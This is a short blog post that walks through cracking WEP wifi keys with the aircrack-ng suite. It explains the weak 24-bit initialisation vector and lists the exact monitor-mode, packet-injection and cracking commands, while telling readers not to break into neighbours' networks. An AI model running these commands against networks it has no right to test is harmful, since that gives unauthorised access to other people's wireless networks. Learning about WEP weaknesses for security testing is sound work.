So before everyone thinks "yay free wifi" don't start breaking in to your next doors wifi. Instead, try advising them that maybe they should think about changing their security.
A few prerequisites;
You will struggle to do this in a virtual box.
A lot of laptop network cards will not work as there are driver issuses.
The network card must be able to switch to monitor mode and if it can also packet inject, it makes life easier.
Theory:
So why is WEP so insecure? WEP uses the RC4 stream cipher, an initialisation vector and the WEP key.
The initialisation vectors(IV) is only 24bits long which is far to short. When packets are sent though the access point, the WEP key plus the IV are sent meaning that it is visible for all to see. Once the attack has seen or collected enough of these IV's its possible to work out the WEP key. By re-injecting the packets we are able to speed up this process.
The steps:
airmon-ng airmon-ng start wlan0 airodump-ng mon0 airodump-ng -c -w 2neon --bssid (bssid) mon0 aireplay-ng -1 0 -a (bssid) mon0 aireplay-ng -3 -b (bssid) mon0 aircrack-ng -b (bssid) (2neon-01.cap) -c is the channel of the access point -w is a text file name it anything aslong as at the end you call txt-01.cap
The video:
WEP cracking in BT
Again the mouse was gayed when recording this, will make sure that in the next vids that is sorted.
In the words of swaZ "we're cooking now".
Cheers
2neon
No comments:
Post a Comment